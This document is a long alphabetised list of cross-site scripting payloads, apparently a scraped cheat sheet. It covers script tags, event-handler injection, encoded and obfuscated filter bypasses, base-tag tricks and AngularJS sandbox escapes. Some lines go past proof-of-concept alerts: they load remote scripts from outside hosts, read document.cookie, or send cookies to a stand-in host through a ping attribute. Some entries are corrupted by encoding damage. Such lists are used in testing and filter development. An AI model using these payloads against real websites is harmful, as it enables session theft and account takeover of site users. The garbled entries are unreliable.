- //”;alert(String.fromCharCode(88,83,83))
- ‘;alert(String.fromCharCode(88,83,83))//
- alert(String.fromCharCode(88,83,83));’))”>
- alert(String.fromCharCode(88,83,83));’))”>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
- alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// —
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//--></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <”’;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;;alert(String.fromCharCode(88,83,83))//\’;;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))// →;<;/SCRIPT>;”;>;’;>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String. fromCharCode(88,83,83))//”;alert(String.fromCharCode (88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// — /SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’; alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//\”; alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT> — !><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
- ;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//V></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- alert(String.fromCodePoint(88,83,83))
- alert(String(/xss/).substr(1,3))
- alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74” ][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
- alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
- alert(unescape(escape(/????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????/).replace(/u.{8}/g,[])))
- alert(unescape(escape(/??/).replace(/u.{8}/g,[])))
- alert(win == window); // false
- alert(1)
- ‘;alert(/xss/)///
- );alert(Xss);//
- ��);alert(��Xss��);//
- ‘|alert(‘XSS’)|’
- ‘); alert(‘XSS
- “;alert(‘XSS’);//
- \”;;alert(‘;XSS’;);//
- \”;alert(‘XSS’);//
- \\”;alert(‘XSS’);//
- : ({[alert`xss`]:1})
- ({[alert`xss`]:1})
- ‘;alert(/xss/)///’;alert(1)//”;alert(2)///”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(/xss/)</SCRIPT>=&{}”);}alert(6);functions+xss(){//
- );alert(xss-by-shawar);//
- alert(/xss/.source)
- ‘); alert(‘xss’); var x=’
- \\’); alert(\’xss\’);var x=\’
- ��); alert(��XSS Vulnerability��); void(��0 ‘ “/>”><img src=x onerror=prompt(/XSS/)>
- /ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
- /ale/.source + /rt/.source
- alt=’”name=’onerror=alert()//’
- alt= onclick=alert(1)
- alt=””onclick=”alert(1)”
- alt=``onload=alert(1)
- al\u0065rt(1)
- al\u0065rt(87)
- always>%20<param%20name=url%20value=https://l0.cm/xss.swf>
- always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
- <a name=javascript:alert(1) href=//target.com/?xss=<svg/onload=location=name//>CLICK</a>
- angular.bind(self, alert, 9)()
- angular.element.apply(alert(9))
- <animate attributeName=”onunload” to=”alert(1)”/>
- <animate attributeName=”xlink:href” begin=”0" from=”javascript:alert(1)” to=”&” />
- /><animate attributeName=”xlink:href” values=”;javascript:alert(1)”
- <animation xlink:href=”data:text/xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
- <animation xlink:href=”javascript:alert(1)”/>
- <anytag onclick=alert(16)>M
- <anytag onmouseover=alert(15)>M
- anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
- anythinglr00</script><script>alert(document.domain)</script>uxldz
- <anything onbeforescriptexecute=confirm(1)>
- <anything onmouseover=javascript:confirm(1)>
- <a onclick=alert(18)>M
- <a=” onclick=”alert(1)//”>clickme</a>
- <a onclick=”i=createElement(‘iframe’);i.src=’javascript:alert(/xss/)’;x=parentNode;x.appendChild(i);” href=”#”>Test</a>
- <a oncut=alert(1)>
- <a/oncut=alert(1)>
- <a onhelp=’eval(href+”confirm(1)”)’contenteditable=’true’href=’ javascript:’>click</a>
- <a onkeydown=alert(document.cookie)>xxs link</a>
- <a onkeypress=”alert(document.cookie)”>xxs link</a>
- <a onkeypress=alert(document.cookie)>xxs link</a>
- <a onkeyup=”alert(document.cookie)”>xxs link</a>
- [[a|onload=alert(1)]]
- <a onload=”alert(document.cookie)”>xxs link</a>
- <a onload=alert(document.cookie)>xxs link</a>
- </a onmousemove=”alert(1)”>
- <a/onmousemove=alert(1)//>renwax23
- <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3 B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x 6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
- <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
- <a onmouseover%3D”alert(1)”>renwax23
- <a onmouseover=alert(17)>M
- <a onmouseover=”alert(document.cookie)”>xxs link</a>
- <a onmouseover=alert(document.cookie)>xxs link</a>
- <a onmouseover=”javascript:window.onerror=alert;throw 1>
- <a onmouseover=location=’javascript:al
 1rt(1)'>a<a>
- <a onmouseover=location=’javascript:alert(1)'>a<a>
- <a onmouseover=location=��javascript:alert(1)>click
- <a onmouseover=location=javascript:alert(1)>click
- <a onmouseover=location=zjavascript:alert(1)>click
- <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>rhainfosec
- <a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B’>
- <a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B’>xss
- a. ping=`//pkav/?${escape(document.cookie)}`
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))// — ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- '';! — "<XSS>=&{()}
- appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
- appendChild(createElement(“script”)).src=”//HOST:PORT”},0)>
- <APPLET+CODE=””+CODEBASE="http://url/xss">
- <applet code=javascript:alert(‘sgl’)>
- <applet code=”javascript:confirm(document.cookie);”>
- <Applet code = “javascript: confirm (document.cookie);”>
- <applet code=”javascript:confirm(document.cookie);”> // Firefox Only
- <applet/object onerror=alert(‘XSS’)>
- <applet onerror=”alert(1)”></applet>
- <applet onerror applet onerror=”javascript:javascript:alert(1)”></applet onerror>
- <applet onError applet onError=”javascript:javascript:alert(1)”></applet onError>
- <applet onreadystatechange applet onreadystatechange=”javascript:javascript:alert(1)”></applet onreadystatechange>
- <applet onReadyStateChange applet onReadyStateChange=”javascript:javascript:alert(1)”></applet onReadyStateChange>
- &a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);
- a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);
- <a rel=”noreferrer” href=”//google.com”>click</a>
- <a rel=”noreferrer” href=”//xss.cx”>click</a>
- arg 1�Galert(1)
- Array.from([1],alert)
- Array.map([1],alert)
- Array.prototype[Symbol.hasInstance]=eval;”alert(1)” instanceof [];
- Array[Symbol.species].constructor(‘alert(1)’)();
- <article xmlns =”urn:img src=x onerror=xss()//” >renwax23
- a?<script>alert(‘Vulnerable’)</script>
- ascript:alert(‘XSS’);”>
- ?asfunction:getURL,javascript:alert(1)//”,
- ASP a = val1,val2
- ASP.NET a = val1,val2
- <a style=”behavior:url(#default#AnchorClick);” folder=”javascript:alert(1)”>click</a>
- <a style=”behavior:url(#default#AnchorClick);” folder=”javascript:javascript:alert(1)”>XXX</a>
- <a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a>
- <a style=”-o-link:’javascript:javascript:alert(1)’;-o-link-source:current”>X
- <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”alert(1);”>XXX</a></a><a href=”javascript:alert(2)”>XXX</a>
- <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”javascript:alert(1);”>XXX</a></a><a href=”javascript:javascript:alert(1)”>XXX</a>
- </a style=””xx:expr/**/ession(document.appendChild(document.createElement(‘script’)).src=’http://h4k.in/i.js')">
- <a target=_blank href=”data:text/html,<script>confirm(opener.document.body.innerHTML)</script>”>clickme in Opera/FF</a>
- “‘> →<a/target=_blank href=//go.bmoine.fr/tab-nabbing>Polyglot XSS</a>
- <a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
- <a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
- <a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
- <a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
- <a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <a target=”x” href=”xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
- atob.constructor(atob`YWxlcnQoMSk`)``
- atob.constructor(atob(/YWxlcnQoMSk/.source))()
- atob.constructor(unescape([…escape((??????????????????????????????????????????????????=?=>?).name)].filter((?,?)=>?%12<1|?%12>9).join([])))()
- atob(“YWxlcnQoMSk=”)
- atob`YWxlcnQoMSk` instanceof window
- [atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
- {{a=toString().constructor.prototype;a.charAt=a.trim;$eval(‘a,alert(1),a’)}}
- {{ ‘a’[{toString:false,valueOf:[].join,length:1,0:’__proto__’}].charAt=[].join; $eval(‘x=alert(1)//’); }}
- {{‘a’[{toString:[].join,length:1,0:’__proto__’}].charAt=’’.valueOf;$eval(“x=’”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+”’”);}}
- .attr
- attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
- \’-a\u{6c}e\u{72}t(1))%0a →
- <audio onerror=”javascript:alert(1)”><source>//INJECTX
- <AuDiO/**/oNLoaDStaRt=’(_=/**/confirm/**/(1))’/src><! — renwax23
- <audio src=1 href=1 onerror=”javascript:alert(1)”></audio>
- <audio src=1 onerror=alert(1)>
- <audio src=”data:audio/mp3,%FF%F3%84%C4%FF%F3%14% C4" oncanplay=”alert(1)”>
- <audio src onloadstart=alert(1)>
- <audio src onloadstart=alert(101)>
- <audio src=x onerror=confirm(“1”)>
- <audio src=x onerror=prompt(1);>
- <audio src=x onerror=prompt(1);>
- “ autofocus onfocus=alert(1) “
- “autofocus/onfocus=alert(1)//
- “autofocus/onfocus=alert(1)
- autofocusonfocus=alert(1)//
- ‘“/autofocus/onfocus=’alert(1)’x=
- “autofocus/onfocus=alert(78)//
- ‘ autofocus onkeyup=’javascript:alert(123)
- “ autofocus onkeyup=”javascript:alert(123)
- “autof<x>ocus o<x>nfocus=alert<x>(1)//
- <AutoStart>1</AutoStart>
- avascript:alert(document.cookie)
- <A?vg><A?cript/href=//aEa?L>
- <a[\x0B]
- <a xlink:href=”http://google.com">
- <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/></a>
- <a xmlns:xlink=��http://www.w3.org/1999/xlink�� xlink:href=��javascript:alert(9)��>
- ><a XSS-test href=jAvAsCrIpT:prompt(/Xss-By-Muhaddi/)>ClickMe
- ��><a XSS-test href=jAvAsCrIpT:prompt(/Xss-By-Muhaddi/)>ClickMe
- ><a XSS-test href=jAvAsCrIpT:prompt(/XSS-by-Shawar/)>ClickMe
- a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29}
- a{xxx:expression(if(!window.x){alert(‘xss’);window.x=1;})}
- <a z=&x=& onmousemove=t=Object(window.name);
- <a z=&x=& onmousemove=t=Object(window.name);({$:#0=t,z:eval(String(#0#).replace(/@/g,))}).z//>
- b=`*/(1)}`;
- <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
- <BackgroundColor>FFFFFF</BackgroundColor>
- background-repeat:no-repeat V><math><!V
- background:url(‘//brutelogic.com.br/webgun/img/youtube1.jpg’);
- background:url(//brutelogic.com.br/webgun/img/youtube1.jpg);background-repeat:no-repeat V><math><!V
- <b/alt=”1"onmouseover=InputBox+1
- <b/alt=”1"onmouseover=InputBox+1 language=vbs>test</b>
- <b/alt=”1"onmouseover=InputBox+1language=vbs>test</b>
- banner.swf?clickTAG=javascript:alert(1);//
- base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
- <base href=//0>
- <base href=data:/,0/><script src=alert(1)></script>
- <base href=data:/,alert(1)/><script src=”jquery.js”></script>
- <base href=”/\evil”>
- <base href=javascript:/0/><iframe src=,alert(1)></iframe>
- <base href=”javascript:\”> <a href=”//%00confirm(2);//”>XSS</a>
- <base href=”javascript:\”> <a href=”//%0a%0dconfirm(2);//”>XSS</a>
- <base href=”javascript:\”> <a href=”//%0aalert(/1/);//”>link</a>
- <base href=”javascript:\”> <a href=”//%0aconfirm(2);//”>XSS</a>
- <base href=”javascript:/”><a href=”**/alert(1)”><base href=”javascript:/”><a href=”**/alert(1)”>
- <base href=”javascript:\”> <a href=”//xss.cx/xss.js”>XSS</a>
- <base+href=”javascript:alert(1);//”>
- <BASE href=”javascript:alert(‘X8SS’);//”>
- <;BASE HREF=”;javascript:alert(‘;XSS’;);//”;>;
- <BASE HREF=”javascript:alert(‘XSS’);//”>
- <BASE HREF=”javascript:alert(‘XSS’);//”>
- <BASE HREF=”javascript:alert(XSS);//”>
- <BASE HREF=”javascript:confirm(‘XSS’);//”>
- <base HREF=”javascript:document.vulnerable=true;//”>
- <BASE HREF=”javascript:javascript:alert(1);//”>
- <base/href=jAvaScript:/>
- ?base=javascript:alert(0)”,
- <base target=”<script>alert(1)</script>”><a href=”javascript:name”>CLICK</a>
- ?baseurl=asfunction:getURL,javascript:alert(1)//”,
- <b class=”ng-include:’//evil’’”>
- %BCscript%BEalert(%A21%A2)%BC/script%BE
- %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
- begin=”0s” dur=”0.1s” fill=”freeze”/>
- <BGSOUND id=XSS SRC=”javascript:alert(‘XSS’);”>
- <bgsound onPropertyChange bgsound onPropertyChange=”javascript:javascript:alert(1)”></bgsound onPropertyChange>
- <bgsound+src=”javascript:alert(1);”>
- <BGSOUND src=”javascript:alert(‘XjSS’);”>
- <;BGSOUND SRC=”;javascript:alert(‘;XSS’;);”;>;
- <BGSOUND SRC=”javascript:alert(‘XSS’);”>
- <BGSOUND SRC=”javascript:alert(‘XSS’);”
- <BGSOUND SRC=”javascript:alert(XSS);”>
- <BGSOUND SRC=”javascript:alert(‘XSS’);”>
- <BGSOUND SRC=”javascript:confirm(‘XSS’);”>
- <bgsound src=”javascript:document.vulnerable=true;”>
- <bgsound SRC=”javascript:document.vulnerable=true;”>
- <BGSOUND SRC=”javascript:javascript:alert(1);”>
- <blah style=”blah:expression(alert(1))” />
- <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
- [<blockquote cite=”]”>[“ onmouseover=”alert(‘RVRSH3LL_XSS’);” ]
- <b><noscript><a src=’x’ style=’x:\3c\2fnoscript\3e\3ciframe/onload\3d alert(1)\3e’>
- </body>
- <BoDy%0AOnpaGeshoW=%2bwindow.prompt(1)
- body.appendChild(createElement(‘script’)).src=’//DOMAIN’
- <BODY BACKGROUND=”javascript:alert(‘XeSS’)”>
- <;BODY BACKGROUND=”;javascript:alert(‘;XSS’;);”;>;
- <BODY BACKGROUND=”javascript:alert(‘XSS’);”>
- <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- <BODY BACKGROUND=”javascript:alert(XSS)”>
- <BODY BACKGROUND=javascript:alert(XSS)>
- <body background=javascript:alert(/xss/)></body>
- <BODY BACKGROUND=”javascript:confirm(‘XSS’)”>
- <body BACKGROUND=”javascript:document.vulnerable=true;”>
- <body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
- <body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
- <body background=javascript:’”><script>alert(XSS)</script>></body>
- body{background:url(JavAs cr ipt:alert(0))}
- body{background:url(“javascript:alert(‘xss’)”)}
- <body <body onload=;;;;;al:eval(‘al’+’ert(1)’);;>
- </BODY></HTML>
- <body id=XSS onscroll=eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body language=vbsonload=alert-1
- <body language=vbs onload=alert-1
- <body language=vbsonload=alert-1
- <body language=vbs onload=alert-1 // IE-8
- <body language=vbs onload=confirm-1
- <body language=vbs onload=window.location=’data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+’>
- “><body language=vbs onload=window.location=’http://xss.cx'>
- <body/onactivate=alert(1)>
- <body/onactivate=URL=name//
- <body onbeforeunload body onbeforeunload=”javascript:javascript:alert(1)”></body onbeforeunload>
- <body onBeforeUnload body onBeforeUnload=”javascript:javascript:alert(1)”></body onBeforeUnload>
- <body onblur body onblur=”javascript:javascript:alert(1)”></body onblur>
- <body onblur=x onload=popup=1;>
- <body onclick=”poc();”>
- <body onerror=popup=1;><svg/onfocus=import>
- <body onfocus=alert(1)>
- <body onfocus=alert(93)>
- <body onfocus body onfocus=”javascript:javascript:alert(1)”></body onfocus>
- <body onFocus body onFocus=”javascript:javascript:alert(1)”></body onFocus>
- <body onfocus=”location='javascrpt:alert(1)
- <body onfocus=”location='javascrpt:alert(1) >123
- <body onfocus=”location=’javascrpt:alert(1) >123
- <body onhashchange=alert(1)>
- <body/onhashchange=alert(1)><a href=#>clickit
- <body/onhashchange=alert(1)><a href=#>click me
- <body onhashchange=alert(1)><a href=#x>click this!#x
- <body onhashchange=alert(94)><a href=#x>click this!#x
- <body onhelp=alert(1)>press F1! (MSIE)
- <body onhelp=alert(98)>press F1! (MSIE)
- <body oninput=alert(document.domain)><input autofocus></br>
- <body oninput=javascript:alert(1)><input autofocus>
- <body onkeydown body onkeydown=”javascript:javascript:alert(1)”></body onkeydown>
- <body onkeyup body onkeyup=”javascript:javascript:alert(1)”></body onkeyup>
- <body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
- <body onload=a1={x:this.parent.document};a1.x.writeln(1);>
- <body onload=;a2={y:eval};a1={x:a2.y(‘al’+’ert’)};;;;;;;;;_=a1.x;_(1);;;;
- \”><BODY ONLOAD=alert(0x000123)>
- <body onload=;;;;;;;;;;;_=alert;_(1);;;;
- <body onload=alert(1)>
- <body onload=”$})}}}});alert(1);({0:{0:{0:function(){0({“>
- <body/onload=alert(25)>
- <body onload=alert(91)>
- <BODY ONLOAD=alert(‘hellox worldss’)>
- <BODY ONLOAD=alert(iXSSi)>
- <BODY ONLOAD=alert(‘XgSS’)>
- ><body/onload=alert(Xss)>
- ��><body/onload=alert(��Xss��)>
- <body onLoad=”alert(‘XSS’);”
- <body onLoad=”alert(‘XSS’);”
- <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
- <BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
- <BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert(“XSS”)>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- <BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>
- “><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
- “><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- “;>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
- <;BODY ONLOAD=alert(‘;XSS’;)>;
- <BODY ONLOAD=alert(‘XSS’)>
- <BODY ONLOAD=alert(“XSS”)>
- <BODY ONLOAD=alert(��XSS��)>
- <BODY ONLOAD=alert(XSS)>
- <BODY ONLOAD =alert(‘XSS’)>
- ><body/onload=alert(Xss-By-Muhaddi)>
- <body onload=alert(/XSS/.source)>
- “> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘X12SS’);}</SCRIPT><”
- “> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘XSS’);}</SCRIPT><”
- <body onload body onload=”javascript:javascript:alert(1)”></body onload>
- <body onLoad body onLoad=”javascript:javascript:alert(1)”></body onLoad>
- <BODY ONLOAD=confirm(‘XSS’)>
- <body onload=”document.vulnerable=true;”>
- <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
- <body ONLOAD=document.vulnerable=true;>
- <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
- <BODY ONLOAD=javascript:alert(1)>
- <BODY ONLOAD=javascript:javascript:alert(1)>
- <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
- <body/onload=javascript:window.onerror=eval;throw’=alert\x281\x29';>
- <body/onload=location=name//
- <body/onload=location=write(top)//
- <body/onload=<! — >
alert(1)>
- <body/onload=<! — >
alert(1)>
- <body/onload=<! — >
confirm(1)>
- <body/onload=<! — >
confirm(1);prompt(/XSS/.source)>
- ><body/onload=<! — >
confirm(1);prompt(/XSS/.source)>
- “<body/onload=<! — >
confirm(1);prompt(/XSS/.source)>”
- “\”><body/onload=<! — >
confirm(1);prompt(/XSS/.source)>”,
- <body onload=popup=1;>
- <body onload=```${prompt``}`>
- <body onload=prompt(1);>
- <body/onload=self[/loca/.source%2b/tion/.source]=name//
- <body/onload=this[/loca/.source%2b/tion/.source]=name//
- <body/onload=URL=name//
- <body onload=”’use strict’;throw new class extends Function{}(‘alert(1)’)``”>
- <body onload=’vbs:Set x=CreateObject(“Msxml2.XMLHTTP”):x.open”GET”,”.”:x.send:MsgBox(x.responseText)’>
- <body onLoad=”while(true) alert(‘XSS’);”>
- <body onLoad=”while(true) alert(‘XSS’);”>
- <body/onload=window[/loca/.source%2b/tion/.source]=name//
- <body/����$/onload=x={doc:parent[��document��]};x.doc.writeln(1)
- <body onMouseEnter body onMouseEnter=”javascript:javascript:alert(1)”></body onMouseEnter>
- <body onMouseMove body onMouseMove=”javascript:javascript:alert(1)”></body onMouseMove>
- <body onMouseOver body onMouseOver=”javascript:javascript:alert(1)”></body onMouseOver>
- <body onorientationchange=alert(1)>
- <body onorientationchange=alert(orientation)>
- <body onpagehide body onpagehide=”javascript:javascript:alert(1)”></body onpagehide>
- <body onPageHide body onPageHide=”javascript:javascript:alert(1)”></body onPageHide>
- <body onpageshow=”alert(1)”>
